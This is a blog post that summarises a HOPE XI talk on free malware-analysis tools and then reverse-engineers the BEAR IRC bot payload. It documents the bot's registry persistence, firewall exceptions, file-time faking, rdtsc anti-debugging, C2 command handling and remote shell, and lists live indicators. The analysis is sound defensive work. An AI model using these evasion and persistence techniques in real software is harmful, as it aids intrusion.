HOPE XI

This weekend I attended Hackers on Planet Earth (HOPE) XI in NYC. Saturday night there was a presentation from Robert Simmons of ThreatConnect on open source malware labs. All the talks are going to be placed online at some point, but I thought I’d highlight some of the material Robert presented in the meantime.

Robert spoke about the use of either open source or otherwise free tools for analyzing malware. By “otherwise free” I mean tools that might require registration or some other action to be performed in order to obtain access. He attributed his overall analysis framework to some of Lenny Zeltser’s work, highlighting four main areas where the lab (open source or otherwise) can impact the organization:

1. Malware Research
2. Enhanced Threat Intelligence
3. Network Defense
4. Fun [IMO, it’s more fun once you figure the sample out]

Robert also spoke about some of the benefits of an automated malware analysis system. He described “hunt teams” which would use an automated analysis system and other tools to enhance threat intelligence. His vision of a hunt team is sort of a “proactive IR”, meaning that rather than reacting to an incident, this team would go searching for malware or other issues and then use the automated system as a force multiplier for analysis. For instance, say the hunt team locates what they believe to be an undetected piece of malware. The team would then use the automated system to begin building host- and network-based signatures and to gather the pieces necessary for threat intelligence (resolved domains, IP addresses, and so on). This information would then be used to improve defensive measures with updated or new signatures.

His top four entry points for malware are:
1. Files
2. URLs
3. PCAPs
4. Memory Images

My interpretation of this is not that malware literally comes from a memory image, but rather these are the inputs into an automated lab that would then be used to isolate and analyze samples. I think this makes sense because most users aren’t going to be looking through captured packets or memory dumps.

The tools that he highlighted for the talk were:
– Cuckoo Sandbox (also the sandbox used by malwr.com)
– Thug (low interaction URL honeyclient)
– Bro (network monitoring tool)
– Volatility (memory forensics)

One really interesting thing that he mentioned is that Bing can be used for passive DNS type searches. He demonstrated that searching Bing for an IP address returns domains that have resolved to that IP address. This could be really useful in the event that you have a sample that doesn’t resolve a domain name but rather handles C2 via a hard-coded IP address. For example, BEAR resolved her.d0kbilo.com (37.59.118.41), and this IP is actually associated with a few other malicious domains (e.g., l.kokoke.net). If you look up an IP address that you feel is suspicious (say from captured packets during dynamic analysis) and notice that it is associated with numerous domains related to malware, you can reasonably assume that the traffic you found is suspect and should be looked at in more detail. I tried using Bing for this with the BEAR IP address and didn’t have much luck with it; however, trying other IP addresses associated with botnets did reveal other domains that currently or previously resolved to that address. That said, I got some similar results searching on Google also, so perhaps it’s best to just try various search engines for this type of research and then see if you get results from one search engine that you might not get from another.

Anyway, going through the tools, Cuckoo Sandbox is a great tool that I actually use all the time via malwr.com. You can think of a sandbox as sort of an automated container for malware that creates a virtual environment each time a sample is analyzed. In the case of the malwr.com instance, it drops the sample into a Windows XP (or other) environment and then lets the malware run while observing behavior. It’s nice to use a sandbox because it can help get a lot of basic info sorted out for you quickly, such as generating hashes, searching for strings, and so on. These are typically actions that you take with every malware sample that you work on. You can also observe dynamic information such as network activity and dropped files in the sandbox. One thing to keep in mind is that you need to understand the “baseline behavior” of both the type of sample you are analyzing and the environment, so that you can recognize normal behavior that the sandbox might flag. For instance, if you are analyzing a malicious PDF, you should be aware of what files might be dropped or what actions Acrobat Reader will take that are part of normal operation (such as dropping a SQLite database) vs. what can be traced back specifically to the sample you are working on.
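To make the "basic info" step concrete, here is a minimal sketch of the kind of triage a sandbox does for you up front: hashing the sample and pulling out printable strings. This is not how Cuckoo implements it; the function name `triage` and the 4-character minimum are assumptions chosen for illustration.

```python
import hashlib
import re


def triage(data: bytes, min_len: int = 4) -> dict:
    """Return hashes and printable ASCII strings for a sample's raw bytes."""
    hashes = {
        name: hashlib.new(name, data).hexdigest()
        for name in ("md5", "sha1", "sha256")
    }
    # Runs of printable ASCII at least min_len long, similar to the
    # classic `strings` utility (ASCII only, no UTF-16 handling).
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    strings = [m.decode("ascii") for m in pattern.findall(data)]
    return {"hashes": hashes, "strings": strings}
```

In practice you would call it as `triage(open(path, "rb").read())` inside an isolated analysis VM and diff the strings against what you see later in a memory dump.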

Thug is a tool that I hadn’t heard of before this talk, and from what I hear it isn’t that well known just yet. Thug complements tools like Dionaea. Dionaea and other honeypots sit out there and collect attacks that are directed towards machines, while Thug is a honeyclient that goes out and simulates a connection to suspect sites, in this case websites. It works by crawling sites while simulating various client-side software (e.g., Flash) to see what is triggered by the possibly malicious website, then saving these results for later analysis.

Bro Network Security Monitor could be described simply as an IDS, but it appears that this description doesn’t really do it justice. It’s more of a framework than a system, and it’s actually been around since the 1990s so it has quite a bit of experience backing it up at this point. Though Bro’s focus is on network monitoring, you can also use Bro to do traffic analysis, which is how Robert presented this tool during the talk. I remember one interesting point he made was that Bro is very good at recognizing types of traffic, so if you see captured traffic that Bro didn’t identify, chances are it’s something very shady, since at this point Bro will successfully identify pretty much anything that is legitimate. I think sometime I’m going to try using Bro instead of other tools (like Wireshark) and see what results I get.

The last tool that he mentioned was Volatility, which probably doesn’t need an introduction but I’ll talk about it a bit anyway. Volatility is a framework for volatile memory analysis/forensics. There are a few reasons why you might want to look into this type of memory. One is that you might be able to get a better look into things that would otherwise have been obfuscated during static or dynamic analysis. For example, when I analyzed BEAR, the domain and IP address for the C2 server were not visible in the static analysis, but they were visible in the memory dump that I took with one of the Sysinternals tools. Another thing that you can do, which Robert highlighted in the talk, is compare two snapshots of memory to see what has changed because of the malware. He took a sample of “normal” memory and then a sample of memory after running the suspicious file and then compared the two in order to help determine what new processes (and other indicators) were associated with the malware sample.
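The before/after comparison can be sketched in a few lines once you have the process names from each memory image (for example, copied out of a process listing). This is only an illustration of the diffing idea, not Volatility code; the function name and the sample lists in the usage note are made up.

```python
from collections import Counter


def new_process_names(baseline, infected):
    """Return process names that appear more often after infection than before.

    PIDs differ between captures, so the comparison is by (lowercased)
    name and instance count only.
    """
    before = Counter(name.lower() for name in baseline)
    after = Counter(name.lower() for name in infected)
    # Counter subtraction keeps only names whose count increased.
    return sorted((after - before).elements())
```

For example, with a baseline of `["System", "svchost.exe", "explorer.exe"]` and an infected list that adds one extra `svchost.exe` and an unfamiliar executable, both show up in the result. An extra instance of a legitimate-looking name is worth as much attention as a brand new name.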

This was a great talk. A couple of other things – one was that Robert had a really clean format for displaying analytical results in swimlanes. He basically set up a swimlane for each of the four tools and then inserted the signatures obtained by each tool in the respective swimlane. I thought it was a great visualization, and I think I’d like to try it at some point with one of my future analyses. The other thing that was nice was that it looks like Robert’s thought process around malware analysis (at a high level) lines up with what I learned, so it was a good validation of how I’ve taught myself and the materials that I used.

Robert has some interesting repositories up on his GitHub site and he’s also on Twitter if you’re interested in following his work.

BEAR, Part II

Next up is to analyze the decrypted payload from the previous analysis (BEAR). One interesting thing is that this sample failed to run in the malwr.com sandbox, so I wonder if there’s something in the sample that prevented that or if it was just a random failure.

Looking at strings, I’m finding that it appears to be in the clear and without the same obfuscation as the launcher:

bear2-1

The strings observed are mostly the same as the ones in the prior analysis, the ones recovered from the running process image. I do see one string that I don’t recall seeing in the prior analysis, this one having to do with the registry:

bear2-2

Opening the payload in PEview, we see much more information than last time. One thing I noted was that the date/time group in this file was 2009/12/24 13:25:55Z. These can be patched after the fact, but I wonder if this indicates that this is actually a very old sample that has just been repackaged recently.
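If you want to pull that compile timestamp without a GUI tool, the field lives at a fixed place in the PE headers. The sketch below reads it with nothing but the standard library; the function name is my own, and it does no validation beyond the two signatures.

```python
import struct
from datetime import datetime, timezone


def pe_timestamp(data: bytes) -> datetime:
    """Return the COFF TimeDateStamp of a PE file as a UTC datetime."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    # e_lfanew (offset 0x3C in the DOS header) points at the "PE\0\0" signature.
    (pe_offset,) = struct.unpack_from("<I", data, 0x3C)
    if data[pe_offset:pe_offset + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    # COFF header after the signature: Machine (2 bytes),
    # NumberOfSections (2 bytes), then TimeDateStamp (4 bytes).
    (stamp,) = struct.unpack_from("<I", data, pe_offset + 8)
    return datetime.fromtimestamp(stamp, tz=timezone.utc)
```

Keep in mind the caveat above: this value is just four bytes in the file and is trivially patched, so treat it as a hint rather than evidence.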

There are also several imports that are in the clear:
– msvcrt.dll
– kernel32.dll
– ws2_32.dll
– user32.dll
– advapi32.dll
– shell32.dll

I’ve included the full list of imported functions in the report linked to at the end of this analysis, but I’d like to mention a few of them:

WS2_32: WSAStartup, Socket, Bind, Listen, Connect, Send/Recv, GetHostByName, Inet_Addr

This sample uses the lower-level (when compared with a DLL such as wininet.dll) library to establish networking. Using WS2_32 can require more “construction” of various parts of traffic, such as headers. This can lead to more signatures within the malware itself, such as hard-coded user agents or typos that make a user agent slightly different from a legitimate one. GetHostByName is used to resolve a domain name, while Inet_Addr converts a dotted-decimal IPv4 address string into the numeric form that other functions use. WSAStartup is used to initialize networking, so a good way to find where the networking functionality begins is to look for this function in the disassembly or set a breakpoint for this function in the debugger. One thing I find curious about these imports is that it seems that there is a function missing here. Between a client-side and server-side instance, here is what you would typically see:

Client side calls:
1. WSAStartup (initialize networking)
2. Socket (creates the socket)
3. Connect (connects to the remote socket)
4. Send/Recv as appropriate

Server side calls:
1. WSAStartup
2. Socket
3. Bind (attaches the socket to a port)
4. Listen (sets the socket to listen for traffic)
5. Accept (waits for an incoming connection from a remote system)
6. Send/Recv as appropriate

What’s absent from the imported functions above is Accept. I double checked, and I do not see that being imported. This would only be required under the server side calls – I’m guessing that this malware is a client, however given the number of functions imported I’m a bit surprised to see Accept missing from the list. Perhaps this is an oversight, or maybe this function is called some other way (an indirect call like CALL EAX), or finally it might be a clue as to the malware’s function.
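To show where Accept sits in the sequence, here is a small loopback sketch of both call orders using Python's socket module, which wraps the same Winsock calls on Windows (and performs the WSAStartup-style initialization for you). The function names and the uppercase-echo behavior are invented for the demonstration.

```python
import socket
import threading


def serve_once(listener: socket.socket) -> None:
    """Server side after socket/bind/listen: accept one client and reply."""
    conn, _addr = listener.accept()          # accept: the call missing from the imports
    with conn:
        conn.sendall(conn.recv(1024).upper())  # recv, then send


def demo() -> bytes:
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # socket
    listener.bind(("127.0.0.1", 0))          # bind (port 0 = any free port)
    listener.listen(1)                       # listen
    port = listener.getsockname()[1]
    worker = threading.Thread(target=serve_once, args=(listener,))
    worker.start()

    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    # socket
    client.connect(("127.0.0.1", port))      # connect
    client.sendall(b"ping")                  # send
    reply = client.recv(1024)                # recv
    client.close()
    worker.join()
    listener.close()
    return reply
```

Without the accept step the server can bind and listen but never gets a connected socket to read from, which is why its absence from a binary that imports Bind and Listen stands out.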

Kernel32: CreatePipe, PeekNamedPipe

Pipes can be used to simplify connectivity to a remote C2 server. PeekNamedPipe is called to copy data from a named pipe without removing it.

Kernel32: CreateMutexA

Mutexes are sometimes created to help ensure that multiple instances of the malware are not running at the same time on the same machine. The malware will check for the presence of the mutex and then exit if found. This can also be a good way to find host-based signatures, in the event of a hard-coded (fixed) mutex name. Later on, we actually do observe a mutex created (dc3d5c2012d372867 88b94a5d50d7a3cf0).

ADVAPI32: CryptAcquireContextA, CryptReleaseContext, CryptGenRandom

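CryptAcquireContextA is used to initialize the Windows CryptoAPI by acquiring a handle to a cryptographic service provider. CryptGenRandom fills a buffer with random bytes from that provider, and CryptReleaseContext releases the handle.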

Kernel32: GetTickCount, QueryPerformanceCounter

These both can be used in anti-debugging operations, however they can also have other uses as well. For example, in the BEAR launcher we saw that GetTickCount was essentially used to seed a random number generating function.

Kernel32: SetFileTime

This can be used to modify the creation/last access/last modified dates and times on files, which can be used to hide malicious modifications to files on a victim machine.
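A quick way to convince yourself that file times are weak evidence on their own is to change one yourself in a lab. The sketch below uses Python's portable `os.utime`, which only sets the access and modification times; SetFileTime on Windows can also set the creation time. The helper names and the chosen date are arbitrary.

```python
import os
import tempfile
from datetime import datetime, timezone


def backdate(path: str, when: datetime) -> None:
    """Set the access and modification times of path to `when`."""
    ts = when.timestamp()
    os.utime(path, (ts, ts))


def demo() -> float:
    """Create a scratch file, backdate it, and return its reported mtime."""
    with tempfile.NamedTemporaryFile(delete=False) as f:
        f.write(b"test")
        path = f.name
    try:
        backdate(path, datetime(2009, 7, 14, tzinfo=timezone.utc))
        return os.stat(path).st_mtime
    finally:
        os.remove(path)
```

The file was created seconds ago but reports a 2009 modification time, so a file that "looks old" in a directory listing should still be checked by hash and content.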

Shell32: ShellExecuteA

This is used to execute a new program – I wonder if this will be used to run the self-deletion batch file, or something else. I’ll be looking out for new processes and calls to this in the disassembly and debugger.

ADVAPI32: RegClose/Open/CreateKey, RegDelete/Enum/Query/SetValue

I see several functions that are used to create, open and close registry keys as well as look for, delete and/or set values in keys. We saw that the BEAR launcher achieved persistence via the registry, so this is probably what is happening here.

Kernel32: GetLocaleInfoA

I’m curious to see how the malware uses this function – does the payload behave differently based on where the host is located, or upon the language of the victim?

Kernel32: WriteFile, CopyFileA, DeleteFileA

I always like to see these, because it means that I should see something created or removed that could either lead to more clues to functionality or act as a good host-based signature.

As a side note, one grouping of functions that I am not seeing is the set of functions associated with process replacement or injection, which we did see in the BEAR launcher.

Checking out KANAL, there are a few different things here. First, it picks up the base64 index that we could see above in the results from strings. Next, it picks up on a call to an imported crypto function. Finally, it sees constants for MD5. It’ll be interesting to check these references out in the disassembly to see how these are being used.

bear2-3
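What a tool like KANAL does here is essentially signature matching on well-known constants. The following is a rough sketch of that idea, not KANAL's actual logic: it looks for the standard base64 alphabet and the four MD5 initialization values stored little-endian. Note that SHA-1 starts from the same four values, so a hit on those alone is ambiguous.

```python
import struct

BASE64_ALPHABET = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
# MD5 initial state words A, B, C, D (also the first four SHA-1 words).
MD5_INIT = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476)


def find_crypto_markers(data: bytes) -> dict:
    """Return offsets of a base64 alphabet and MD5 init constants, if present."""
    hits = {}
    offset = data.find(BASE64_ALPHABET)
    if offset != -1:
        hits["base64_alphabet"] = offset
    for value in MD5_INIT:
        # x86 code and data store 32-bit constants little-endian.
        offset = data.find(struct.pack("<I", value))
        if offset != -1:
            hits.setdefault("md5_init", []).append(offset)
    return hits
```

The offsets it returns are file offsets, so you still have to map them to virtual addresses before looking them up in the disassembly.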

Dynamic Analysis

During the analysis of the BEAR launcher, it was observed that the behavior was much different when running the sample as a regular user (i.e., not as an admin). For this reason, I opted to run the payload as admin and skip testing as a regular user, with the assumption that the payload would be similarly affected.

One change immediately noticed was the addition of the following keys to the registry:

HKLM\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List

We saw one of these exact keys earlier, in the strings output:

bear2-4

Looking in the registry at this location reveals:

bear2-5

HKLM\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Windows\system32\spooIsv.exe: “C:\Windows\system32\spooIsv.exe:*:Enabled:Windows DLL Loader”
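The data in that firewall value is a colon-separated record, which makes it easy to pull apart when you are collecting host-based indicators. A minimal sketch follows; the field labels `scope` and `status` are my own names for the middle two fields, not official terminology.

```python
from typing import NamedTuple


class FirewallEntry(NamedTuple):
    path: str
    scope: str
    status: str
    name: str


def parse_authorized_app(value: str) -> FirewallEntry:
    """Split an AuthorizedApplications\\List value into its four fields."""
    # Split from the right so the colon after the drive letter stays in the path.
    path, scope, status, name = value.rsplit(":", 3)
    return FirewallEntry(path, scope, status, name)
```

Applied to the value above, this yields the executable path, `*`, `Enabled`, and the display name `Windows DLL Loader`, which matches the name used for the Run entry.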

This value was also added:

HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows DLL Loader: “C:\Windows\system32\spooIsv.exe”

Next, the following file was added:

c:\Windows\SysWOW64\spooIsv.exe

And the following file was deleted:

c:\MA\lab\payload.exe

The method of deleting the sample was the same as in the other analysis – a randomly named batch file was created (with the same instructions) and this was run to delete both the original payload executable and the batch file.

Oh, look at this – here’s spooIsv.exe, but look at the date/time group:

bear2-6

This is almost certainly the place where we see usage of kernel32.SetFileTime to help hide the sudden appearance of this malicious file. The file is also hidden, and happens to be the exact size of the original sample.

Comparing the MD5 hash of each confirms that it’s the same file:

bear2-7

You can observe further confirmation of this file being added to the registry to run at startup:

bear2-8

As mentioned earlier, we do observe a mutex created:

bear2-9

As far as network activity, nothing different was observed between the prior analysis and this one. For full details, please refer to the BEAR launcher analysis.

The payload exhibits the same behavior as the launcher in terms of the iterations of spawned/replaced processes, so please see the prior analysis for details. However, one difference is that when this payload is executed on its own, it does not create two new processes for replacement – only a single instance of each new process is observed.

Disassembly / Debugging

The disassembly is much easier to follow in the payload when compared with the launcher, thankfully.

One of the first major functions after startup is sub 406845. Many things happen in this sub, and I’ll cover the interesting ones here:

Sub 40650E gets the filename and directory of the running process. Soon after that, the malware looks at the filename of the running process and makes a comparison. Based on this comparison, the malware branches:

bear2-10

If the branch “fails”, then it gets the system directory and then does what I presume is some decoding of strings with a loop:

bear2-11

Here’s an example of one of the decoding functions:

bear2-12
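For readers who haven't seen this kind of string decoding before, a repeating-key XOR loop is the usual shape. The sketch below is a generic illustration and an assumption on my part; it does not reproduce the sample's actual key or any extra transformations the decoding subs may apply.

```python
from itertools import cycle


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key; applying it twice restores the input."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))
```

Because XOR is its own inverse, the same routine both encodes and decodes, which is why malware often ships a single small sub that is called all over the place.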

What’s interesting about this block starting at 406885 is that it appears to look for a string (that it concatenates) and it will loop to try and find this string – if successful, it will then jump to 406931 where the registry settings to have the program run at startup are made. If these iterations finally fail (or if the original branch at 40687C is true) then the sub that I call the RegistryAutoruns function is called but in this case to actually delete the registry settings and also log that the malware was uninstalled (this info is sent to C2 using a sub starting at 409003):

bear2-13

Here’s a code snippet to show part of the “CreateBATDeleteAll” sub where we see the batch file being created and executed via ShellExecuteA:

bear2-14

A couple of other blocks of code within this overall function are worth noting, including sub 40642D, which contains the code for setting up the registry keys/values to run the sample at startup:

bear2-15

Within this sub, we also see sub 40627D which makes the registry changes for the firewall access:

bear2-16

Notice also the line that prints a string that logs this change to the system. This generally seems to be a pattern with this malware — you see the string that is recorded for the logging aspect of the function being performed, and then you see calls into the functions that actually perform those actions.

Getting back to the beginning of the disassembly, we see that the system is set to sleep for 1 second (0x3E8) and then the malware creates a mutex:

bear2-17

If there are issues with the mutex creation, then the malware loops back to the code we already discussed. Otherwise, we get to a dense block starting at 409C73:

bear2-18

Stepping through this:

The sub at 4053B1 contains LOTS of plaintext calls to LoadLibraryA and GetProcAddress:

bear2-19

I think we were already aware of most of this, at least at a high level, but there are some interesting calls to LoadLibrary and GetProcAddress. One is a load of netapi32.dll; one of the functions resolved from it is NetScheduleJobAdd, which can be used to schedule a program to run at a later time. Also resolved from this library are NetShareEnum, which enumerates network shares, and NetUserEnum (similar, but for users).

Sub 405F28 is more of the same, just different libraries and shorter:

bear2-20

Sub 407B36 calls memset and InitializeCriticalSection. Sub 403008 is interesting and I can’t say that I fully understand it, but it appears to obtain random data using the __imp_clock function and transformations of that data. There is a function that I’ve named ClockCallAndTransform that is also called. Here are both functions:

bear2-21 bear2-22

bear2-23

This ClockCallAndTransform is the major thing that happens within 403008 and is also called elsewhere (such as from this overall block of code we’re looking at now).

Sub 401EF2 contains calls to set up crypto in this program:

bear2-24

Sub 401000 sets up the base64 index in a spot beginning at 40EAD0:

bear2-25

Sub 4020DF has to do with MD5 encoding, with several subfunctions. One of its first subs is 401478 where we see the MD5 constants set up:

bear2-26

The next two calls are to 4014A0 and 40153F, which themselves work with a function at 40160C, which appears to be the main MD5 sub. We can see the precomputed MD5 table for each round in plaintext:

bear2-27

This is a LONG sub, stretching from 40160C down to 401EAB. Japanese Media Manager has a post of the assembly code for MD5, in case you are interested (or see references below).
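The per-round table is easy to recognize because it is defined by a formula in the MD5 specification: entry i is the integer part of 2^32 times the absolute value of sin(i + 1), with i + 1 in radians. A short sketch that regenerates it, so you can compare against the values in the disassembly:

```python
import math


def md5_table() -> list:
    """Return the 64 MD5 round constants, T[i] = floor(2**32 * |sin(i + 1)|)."""
    return [int(abs(math.sin(i + 1)) * 2**32) & 0xFFFFFFFF for i in range(64)]
```

The first entry is 0xD76AA478 and the last is 0xEB86D391; seeing those as immediates in a long unrolled function is a strong sign that you are looking at the MD5 transform.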

This work done with MD5 is called two additional times (total of 3) and then the mysterious clock function is called four times. This block wraps up with getting the module handle and filename. See below for the fully renamed block:

bear2-28

Pressing on, we see some stuff done with the module handle and filename we gathered at the end of the prior block, and then we get to a denser area starting at 409D28. Sub 406637 is an interesting call in this area. In this sub we see a lot of calls to some of the same functions discussed earlier (the ones setting up persistence, creating the batch file, etc.) but we also see an interesting call at 406382 which is where we see the file time being faked on the installed copy of the malware:

bear2-29

After this is done, then we see the call to WSAStartup which is the beginning of the network activity (at location 409D48). A small block begins at 409D4E, and the first sub called (408D4A) contains lots of networking setup activity via WS2_32 function calls. Throughout all of these calls there are also multiple calls to the XOR transformation subs already discussed and labelled.

There is one very interesting sub within this big mess, though, which is at 408A9F. This is the sub where the initial communication with C2 is handled via IRC. First, clock data is gathered with a call to a sub at 4069B5. Following this, there’s a block at 408A9F where we see the connection password is sent which must be done before the user registration takes place:

bear2-30

Soon after, we see the creation of the user registration string that is then sent to C2 starting at 408B43:

bear2-31

After this, some checks are done on a couple of the arguments passed to the function and then the system will either branch to start what appears to be a system inventory or it will connect with the generated nick on the IRC server. There is a call to a sub at 407A55 which calls GetTickCount and QueryPerformanceCounter twice and then carries out transformations of various types on the returned values. Another sub within the system inventory branch is 4070D9 which collects the locale info. This sub checks to see if the locale returned is “USA” so I wonder if this is an indication of targeting of particular users. A call to 407750 finds the connected drives and their sizes. A call to 4074B2 XORs four strings and then also sets up communications using those strings. Later we see a call to GetVersionExA, and then the version is checked to see if the host is running Windows XP (version 5.1) or something else:

bear2-32
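When reading a version check like this, it helps to have the major/minor numbers that GetVersionEx reports next to the marketing names. The table below covers the range relevant to this sample; the lookup function and its fallback string are just for illustration.

```python
# (dwMajorVersion, dwMinorVersion) as reported in OSVERSIONINFO.
WINDOWS_VERSIONS = {
    (4, 0): "Windows 95 / NT 4.0",
    (4, 10): "Windows 98",
    (4, 90): "Windows Me",
    (5, 0): "Windows 2000",
    (5, 1): "Windows XP",
    (5, 2): "Windows XP x64 / Server 2003",
    (6, 0): "Windows Vista / Server 2008",
    (6, 1): "Windows 7 / Server 2008 R2",
}


def describe_version(major: int, minor: int) -> str:
    """Map a major/minor pair to a product name, or report it as unknown."""
    return WINDOWS_VERSIONS.get((major, minor), f"unknown ({major}.{minor})")
```

So a comparison of the major version against 5 followed by a comparison of the minor version against 1 is the classic "is this XP?" test.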

After this, we see what looks pretty much like the construction of the nick for the malware’s IRC connection, and then the channel name #balengor:

bear2-33

I’m guessing that this system inventory info might have some role in the way the nick is constructed. It would make sense that the nick would be used to give the author(s) an idea of what system type and capabilities are associated with each nick. Lower we see where the NICK command is actually sent to the C2 channel:

bear2-34

Now, stepping WAAAAY back out several levels to the block starting at 409D4E, the next call there after we’ve done all this system inventory and bot registration on IRC is the sub at 4079DE. This is another sub that makes two calls to GetTickCount and QueryPerformanceCounter and then does transformations with the results. I’m starting to think that these are some sort of random data generator and not involved with anti-analysis.

The next major block is at 409D71, which consists essentially of a call to a tiny sub that will MOV a socket into EAX and then a call that sets up and calls the select function from WS2_32, which will determine the status of a socket to perform synchronous I/O. We see another branch from there that will call recv in WS2_32:

bear2-35

One interesting little thing here:

bear2-36

We see this floating around – in the prior analysis it was observed that the PING commands sent via IRC happened roughly every 90 seconds – this helps confirm that the stuff being done with the clock is used to generate random data. I guess the author(s) thought that sending these commands at exactly 90 second intervals would attract attention, so this mechanism was put in place to make sure that the commands were sent slightly randomly but still close to the 90 second interval.
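The general technique is usually called jitter: a fixed base interval plus a small random offset. The sketch below only illustrates that idea; the 5 second spread is a hypothetical value, and I did not recover the exact transformation the sample applies to its clock data.

```python
import random


def next_ping_delay(base: float = 90.0, jitter: float = 5.0, rng=random) -> float:
    """Return a delay in seconds near `base`, offset by up to +/- `jitter`."""
    return base + rng.uniform(-jitter, jitter)
```

From a detection standpoint this matters because a rule that looks for traffic at exact fixed intervals will miss it, while one that looks for intervals clustered around a mean will not.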

This entire section loops continuously:

bear2-37

Sub 409B98 appears to be where the data from C2 that was obtained with the call to recv is processed. Some highlights from inside this and subordinate subs:

Checking for certain IRC traffic:

bear2-38

Here’s an interesting spot where the program appears to set itself up to look at the base64 encoded string from the topic in the C2 IRC channel #balengor:

bear2-39

Sub 401022 is where we see that string being worked with:

bear2-40

I’m calling the sub at 409B98 “GetCommandsFmTopic”. A few levels into this sub, after doing some work to parse through input received through the C2 IRC channel, we see this sort of innocuous call:

bear2-41

This leads us to a HUGE sub, look at this graph:

bear2-42

I was kind of hoping that I was getting near the end and could wrap this up soon…

4090AE seems to be the main sub where it appears all of the functionality is controlled. The structure looks like a series of if-statements that take the input from C2 to the malware and check the strings and then take actions. For example, the first thing it does is check for the string “PING”:

bear2-43

If it sees “PING”, then it branches elsewhere and sends this command to the IRC channel:

bear2-44

It checks for PING, PONG, MODE, PRIVMSG, etc. At some point we see a check for “433”:

bear2-45

If 433 is detected, i.e., if the jump is NOT followed, then we proceed to an area where the various subs are called to hide the installed malware with a fake file time and delete the original files, check for the locale, do an inventory of drive types and size, get OS info, and then send the NICK command in IRC (I’m only including one of the earlier screenshots because it’s a lot of material to post otherwise):

bear2-46

Other branches give interesting results. Seeing the string “ERROR” seems to send the bot down the path of taking a system inventory and then registering itself; the “JOIN” string can take you down a path where the USERHOST command registers the host the bot is connecting from or it can take you down another path where you check for “001”. This has you set the user mode and join the channel. “451” registers the bot on IRC. “302” leads you down a path where you check for data with an @ in it, probably a userhost string. “NICK” can have you copy a string (I’m assuming the bot nick on the server). “332” has you do some decoding of a base64 string, probably the channel topic that we’ve already seen. The size of this sub itself makes it hard to analyze.
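To keep the numerics straight while reading a dispatcher like this, it helps to parse captured C2 lines and label them. Here is a small sketch using the standard IRC line layout (optional `:prefix`, command, parameters, optional trailing parameter after ` :`); the reply names come from the IRC RFCs, while the function names and example lines are made up.

```python
NUMERICS = {
    "001": "RPL_WELCOME",
    "302": "RPL_USERHOST",
    "332": "RPL_TOPIC",
    "433": "ERR_NICKNAMEINUSE",
    "451": "ERR_NOTREGISTERED",
}


def parse_irc_line(line: str):
    """Split a raw IRC line into (prefix, command, params)."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    # Everything after the first " :" is a single trailing parameter.
    head, sep, trailing = line.partition(" :")
    parts = head.split()
    command = parts[0].upper() if parts else ""
    params = parts[1:]
    if sep:
        params.append(trailing)
    return prefix, command, params


def label(line: str) -> str:
    """Return the symbolic name for a numeric reply, or the command itself."""
    _, command, _ = parse_irc_line(line)
    return NUMERICS.get(command, command)
```

With these names the branches read more naturally: 433 means the chosen nick is already taken, 451 means the client has not registered yet, and 332 carries the channel topic.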

Speaking of hard to analyze, I found a sub that contains two uses of rdtsc (sub 40700B). This instruction can be used to test for the presence of a debugger. It reads the processor’s time-stamp counter, which counts clock cycles since the last reset, and what a program can do is execute it twice (which this one does) and then check how much time has elapsed between the two readings (which this does, it compares the value returned with 1000000). The idea is that if an unreasonably long amount of time has passed, then the assumption is that the program is operating in a debugger. This program appears to just loop endlessly if the two readings are too far apart. The counter advances at roughly the processor’s clock rate, so on a CPU running in the GHz range 1000000 cycles is a millisecond or less, which is not very long at all. Anyone single-stepping through this function would almost certainly get stuck there unless they executed past it or patched the code. Something else must be done to the results, though, because you also see that there’s a call to Sleep for 1000 milliseconds after the first rdtsc, but I didn’t look into this more as I wanted to keep moving on.

bear2-47
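As a rough sanity check on that 1000000 threshold, you can convert cycles to wall-clock time for a given clock speed. This assumes the time-stamp counter advances once per clock cycle at the stated frequency, which is a simplification; the clock speeds used are just example values.

```python
def cycles_to_ms(cycles: int, cpu_hz: float) -> float:
    """Convert a cycle count to milliseconds at the given clock frequency."""
    return cycles / cpu_hz * 1000.0
```

At 2.5 GHz, `cycles_to_ms(1_000_000, 2.5e9)` comes out to 0.4 ms, and even at 1 GHz it is only 1 ms. A human pausing on a breakpoint between the two readings will exceed that by many orders of magnitude.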

One of the branches in 4090AE connects to another huge sub at 40830A – look at this graph:

bear2-48

This sub does all kinds of interesting things:

– Base64 decoding (again, I’m thinking the channel topic)
– Download a new .exe file (probably an update to the bot software) which actually encompasses several interesting subs: 404866 which is used to set up things like ports and addresses depending on the protocol used (http/80, ftp/21, tftp/69) and under that sub 40464E which constructs an HTTP header if necessary. I also noted that the ftp service is set up as anonymous – if I can find the address, then I could possibly log in anonymously and find more files.
– Quit and restart
– Quit and change servers (that’s interesting…)
– Install or uninstall the malware
– Report system uptime
– Scan IPs
– Run exploits against a list of IPs (sub 403698 is called by sub 403861 to do this)
– List exploit statistics (sub 40399A)
– Start a “Remote command thread” with sub 4042A7 (a remote shell and also the ability to execute remote files)
– Gather extensive system and OS info (to include naming the Windows version found) within sub 40740E | 407132. The malware will recognize a range of versions from Windows 95 up to XP/2003, as well as gather processor info.
– Gather network adapter info through subs 407718 | 407523. This will also rate each one as Good / Avarage [sic] / Bad.
– Gather drive info (types and sizes) through subs 4079A6 | 4077CA.

The actual sub that creates the remote shell (403FF3) is actually pretty cool. You can watch it step through the entire process of finding cmd.exe, creating a pipe, duplicating a handle/creating a new process, calling PeekNamedPipe to get data from the pipe without removing it, etc. along with a few error messages.

